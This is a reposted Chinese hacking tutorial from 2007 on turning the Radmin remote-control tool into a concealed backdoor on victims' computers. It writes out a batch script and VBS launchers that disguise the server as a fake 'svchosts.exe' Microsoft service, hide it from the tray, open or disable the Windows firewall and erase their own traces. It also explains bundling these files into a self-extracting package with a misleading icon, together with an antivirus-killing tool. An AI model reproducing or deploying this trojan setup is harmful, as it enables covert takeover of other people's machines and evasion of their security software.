中财网情话的古今异义:[原创]我谈;制软件Radmin服务端配置_Emperor subversion ‘b...
来源:百度文库 编辑:中财网 时间:2024/04/28 23:41:53
作者:颠皇 来源:http://hi.baidu.com/hackervista/ 时间:2007-01-15
现在网上有很多关于Radmin的文章和教程,很多技术型站点都做了收费教程。下面我也来谈谈吧,替大家省钱了。Radmin是一款国外的远程控制软件,在国内许多网站都可以下载到Radmin汉化版或者影子版,目前Radmin官方网站最新版是Radminv3.0(Beta2)版,此客户端完全兼容以前的2.1或2.2版的服务器端。但某些功能需要3.0服务器端的支持,因此这些功能尚不可用。不过可以连接3.0影子版服务端,我试过了没问题。它的连接方式是正向连接,我来介绍一下它的功能和用途:
1.传输速度和效率非常高,只要查找开放4899端口就是安装Radmin服务端的机器了。
2.可以在win98和NT主机以应用程序方式控制,也就是只要执行服务端就行了。
3.在NT或win2000下可安装成服务,而且不需要IPC$管道。
4.自定服务端口可让我们有很多选择(不能劫持系统服务端口,如21、80等,)。
5.设置IP过滤可以增加你拥有肉鸡的稳定性。
6.不容易被杀毒软件查杀(因为它属于商业性质的远程控制软件)。
7.可以不显示系统托盘图标。
8.完全免费的远程控制软件。
Radmin还有很多功能,但是重点就在于如何配置它的服务端。经常使用远程控制软件的人都知道,控制端在自己机器上没问题,服务端在远程计算机上,如果配置有问题,被远程管理员发现,那么就功亏一篑了。所以配置服务端很重要,我们下载3.2影子免安装版,把其中的以下3个文件留下(r_server.exe、raddrv.dll、AdmDll.dll)就行了。
接下来说一下Radmin的配置。在CMD下输入:c:\R_server.exe /setup,弹出安装设置窗,然后我们选择设定密码选项,弹出设置密码对话框,这里设置的8位数密码是在连接远程机器的时候需要输入的,一定要牢记。如果你想用NT服务器的帐号登陆,也可以在这里设置。这里可以设置肉鸡的任何组的帐号,而且有全部的权限。这样就跳过了NT的帐号检查,如果这样设置,那么还需要在Access rights里设置一下权限,一般我们选中All access(代表全部允许)就行了。控制大量肉鸡的话不推荐选中NT帐号检查。接下来我们打开选项设置参数。“IP过滤”可以设置允许连接的IP地址(当然是自己的IP地址),可以是单个IP地址,如10.10.10.10,网关设置成255.255.255.254就行了,当然也可以是C段IP地址,如10.10.10.0,网关设置成255.255.255.0就行了;“端口”默认是4899,你也可以设置为自己想要的端口,我设置的端口是1030。“任务栏图标”一定要设置成隐藏。下面的日志和连接确认不用选,点击确定安装即可。最后打开注册表把HKEY_LOCAL_MACHINE\SYSTEM\RAdmin的注册表文件导出,另存名为Emperor.reg。
接下来我们使用“超级捆绑”把这3个文件捆绑(r_server.exe、raddrv.dll、AdmDll.dll)。修改图标为系统图标,属性修改选中“只读”、“隐藏”和“系统”3项即可,然后还要更名为:svchosts.exe。最后还要做个免杀。然后再去下载两款小工具,Killer(杀杀毒软件防火墙的小工具)、SC(服务添加删除更改工具),同样给这两个工具做免杀,以防万一。免杀我们以后再说,不会的朋友去pediy下载加壳工具慢慢试吧。 再来制作一个Emperor.bat文件,内容如下: @echo off@sc stop r_server @sc stop radmm @sc delete r_server @sc delete radmm
@regedit /s Emperor.reg
@SC create Svchosts BinPath= "%systemroot%\system32\COM\Svchosts.exe /service" type= own type= interact start= auto DisplayName= "Microsoft Remote Control Driver"
@sc description Svchosts "Microsoft Remote Control Driver。"
@sc config wuauserv depend= Svchosts @echo Windows Registry Editor Version 5.00 > %systemroot%\system32\COM\killFirewall.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List] >> %systemroot%\system32\COM\killFirewall.reg
@echo "1030:TCP"="1030:TCP:*:Enabled:Microsoft Remote Control Driver">> stemroot%\system32\COM\killFirewall.reg
@regedit /s %systemroot%\system32\COM\killFirewall.reg
@attrib +h +r %systemroot%\system32\COM\svchosts.exe
@sc start svchosts
@del /q /f /s %systemroot%\system32\COM\Emperor.reg
@del /q /f /s %systemroot%\system32\COM\Emperor.vbs
@del /q /f /s %systemroot%\system32\COM\Emperor.bat
@del /q /f /s %systemroot%\system32\COM\sc.exe
@del /q /f /s %systemroot%\system32\COM\killFirewall.reg
再来制作一个Emperor.vbs文件,内容如下: On Error Resume Next
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("Emperor.bat",0) 文件制作完成:svchosts.exe、Emperor.reg、Emperor.vbs、Emperor.bat、sc.exe、Killer.exe。将它们打包制成自解压形式。勾选RAR里的“创建自解压格式压缩文件”,到高级里打开“自解压选项”,“解压路径”为%systemroot%\system32\COM\,解压后运行“Emperor.vbs”,解压前运行“Killer.exe”,模式里选“全部隐藏”跟“跳过已经存在文件”,文本和图标选项里“从文件加载自解压文件图标”里选一个迷惑性的ico图标做为自解压最后生成的图标。最后生成自解压文件。搞定! 补充:再来看看另一种穿透Windows XP SP2防火墙的思路:我们先要把服务的类型改为禁用。运行输入services.msc打开服务。找到Windows Firewall/Internet Connection Sharing (ICS)这个服务,把类型设置为禁用:做到这一步后,我们打开控制面版-防火墙-例外-添加端口。因为我刚才设端口是1983,填入1983。然后我们要把Windows XP SP2防火墙服务的注册表导出来。位置是在HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedAccess\ 导出命名为sharedaccess.reg,最后我们新建一个Emperor.vbs文件,输入以下内容: set Emperor=wscript.createobject("wscript.shell")
Emperor.run "net stop sharedaccess",0
Emperor.run "regedit.exe /s shardaccess.reg",0
Emperor.run "regedit.exe /s radmin.reg",0
Emperor.run "r_server.exe /install /silence",0
Emperor.run "r_server.exe /start",0 把sharedaccess.reg和Emperor.vbs添加到配置好的Radmin的解压缩包里就OK了。